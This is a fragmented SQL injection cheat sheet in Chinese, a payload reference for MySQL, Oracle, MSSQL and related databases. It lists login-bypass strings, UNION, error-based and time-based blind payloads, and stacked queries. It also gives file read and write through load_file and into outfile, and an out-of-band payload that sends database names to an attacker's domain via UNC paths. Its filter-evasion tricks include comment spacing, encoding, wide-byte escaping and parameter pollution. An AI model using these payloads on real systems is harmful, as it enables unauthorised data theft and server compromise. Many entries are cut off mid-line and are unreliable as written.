#1 利用系統特有變數去測試是否觸發 error
#2 用註解辨別
#
UNICODE(SQUARE(NULL)) IS NULL
@@ROWCOUNT
| | MySQL | Oracle | MSSQL |
---|---|---|---|
註解符 | /* 、/*!*/ 、/**/ 、# 、/*!${[0-9]{5}} ${command}*/ 、-- | -- 、/**/ | -- 、/**/ 、--%0a- |
空白字符 | %09%0A%0B%0C%0D%20 | %00%09%0A%0B%0C%0D%20 | %00-%20 |
mysql
/*!${[0-9]{5}} ${command}*/
版本大於${[0-9]{5}} 執行 ${command}--
-- 後需要有至少一空白或控制字元
#
Oracle
MSSQL/Transact-SQL
/etc/mysql/my.cnf
/var/lib/mysql
show databases;
use $database;
show tables [from $database];
show columns from [$database.]$table;
show grants [for $user@$host];
show global variables;
create database $database;
drop database $database;
create table $table ($column1 $type, ...) [from $database];
drop table $table [from $database];
insert into $table($column1, $column2...) values($value1, $value2...);
select $column1,$column2... from [$database.]$table;
update $table [from $database] set $column1=$value1,... [condition];
delete from [$database.]$table [condition];
user();
database();
select schema_name from information_schema.schemata;
version();
@@datadir;
select table_name from information_schema.tables where table_schema=database();
select column_name from information_schema.columns where table_schema=$database and table_name=$table
select name from users where id=1;
select name from users limit $start,$count;
select (select id from users limit 0,1)id,name as ji from users limit 0,3;
select name from users where id regexp '^ji..$';
if(expression, true:,false:);
select * from users where id='$id';
' or '1'='1;
=> select * from users where id='' or '1'='1';
select * from users where id=('$id');
') or '1'=('1;
=> select * from users where id='' or '1'=('1');
select database()
union select user(),version(),database();
to_char(1/0)
1/0
cast(1/0 as text)
SELECT IF (${COND}, (SELECT 1,2), 'a')
(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
extractvalue(1,concat("]",(select user())));
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
select *
取值出錯
updatexml(1,concat("]",(select user())),1);
exp(~(select * from(select user())a));
if(expression, true: a,false: b);
version() regexp '^10.3';
= true
left(version(),3);
= '10.3'
mid(version(),2,5);
= '0.3.1'
right(version(),5);
= 'aDB-1'
ascii('a');
= '97'
db | command |
---|---|
Oracle | dbms_pipe.receive_message(('a'),10) |
MS | WAITFOR DELAY '0:0:10' |
PostgreSQL | pg_sleep(10) |
MySQL | sleep(10) |
1'='1' and (boolean expression) and sleep(1);
1'='1' and (boolean expression) and benchmark(10000000,sha(1));
SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
select get_lock('karma',1);
select rpad('a',4999999,'a') RLIKE concat(repeat('(a.*)+',30),'b');
;
串接複數查詢語句 (mysql_multi_query)
; insert into users(id, name) values(7122,'jizz');;
檢測當前權限
select @@GLOBAL.secure_file_priv
show grants
: current user, 查看自身權限時不需要其他權限
select * from information_schema.user_privileges
: global
所有資料庫設定: select * from information_schema.global_variables[where variable_name=$varName and variable_value=$varValue];
資料庫可不可寫: select @@secure_file_priv;
, show variables
所有權限欄位名: select column_name from information_schema.columns where table_schema='mysql' and table_name='user';
讀寫權限: select File_priv from mysql.user where concat(user,'@',host)=user();
host, user, password, (select|insert|update|delete|create|drop|file)_priv
into
受 secure_file_priv
限制: select ... into outfile $absPath [terminated by ...];
dumpfile
: no formatting
outfile
: formatting
@var_list
: 存到 variable
@@datadir
secure_file_priv 限制
secure_file_priv 限制
load_file()
:select 1,2,load_file($absPath);
load data infile
: select load data infile $absPath .....
MariaDB 沒有 NULL 這個配置,所以預設可寫任何位置… ref
load_file(concat('\\',(select database()),$domain)
/*!{cmd}*/
select 'a' 'b' 'c';
空白 <space>
select/**/*/**/from/**/users;
and(1=0)
逗號 ,
select * from (select user())a join (select version())b join (select database())c;
limit a,b == limit b offset a
mid(c, a, b) == mid(c from a for b) == substr(c from a for b) == right(left(c, a+b-1),b)
having
, where
select * from user where name='cjiso';
select * from user having name='cjiso';
substr
< insert
select substr('abcde',1,3),insert('abcde',4,2,'');
in
> =
select * from user where 'cjiso'in(username);
select * from user where 'cjiso'=username;
sleep
> if
select sleep((1=1*)3);
select if(1=1,sleep(3),Null)
select
TABLE
, VALUES
..... where (table user limit 1) > row(1,1,1,1,1,1.....)
編碼
abcd
0b01100001011000100110001101100100
;B'01100001011000100110001101100100'
;b'01100001011000100110001101100100'
0x61626364
;X'61626364'
;x'61626364'
select _latin1'abcd',_utf8'àbcd',n'àbcd',N'àbcd';
U&"\0441\043B\043E\043D"
%df
可以吃掉 \
,繞過 PHP 的轉義(' => \')
HTTP Parameter Pollution
原理: 解析重複參數順序不一致
條件: 存在解析重複參數順序不一致
情境:
參考:
Tomcat -> Apache: Tomcat 解析第一個,Apache解析最後一個
?id=1&id=payload
參考表格:
Web服務器 | 獲取函數 | 取到的參數 |
---|---|---|
PHP/Apache | $_GET["p"] | Last |
JSP/Tomcat | Request.getParameter("p") | First |
Perl(CGI)/Apache | Param("p") | First |
Python/Apache | getvalue("p") | All(List) |
ASP/IIS | Request.QueryString("p") | All (comma-delimited string) |
select 1 order by 1 union select 2;
error
select 1 limit 0,1 union select 2;
error
procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1);
secure_file_priv 預設會是空值,並且沒有 NULL 可以配置
MariaDB-only executable comment syntax (starting from MariaDB 5.3.1): /*M!###### MariaDB-specific code */
SELECT(1)FROM"sys"."tables"
: 無空格
SCHEMA_NAME
: schema id to schema name
name
: table name
schema_id
object_id
name
: column name
object_id
: object id of the object the column belongs to
webdav UNC
\\server[@SSL][@port][\path]
PROPFIND
https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/
https://learn.microsoft.com/en-us/windows/win32/api/davclnt/nf-davclnt-davgethttpfromuncpath
https://dl.packetstormsecurity.net/papers/general/MySQL_OOB_Hacking.pdf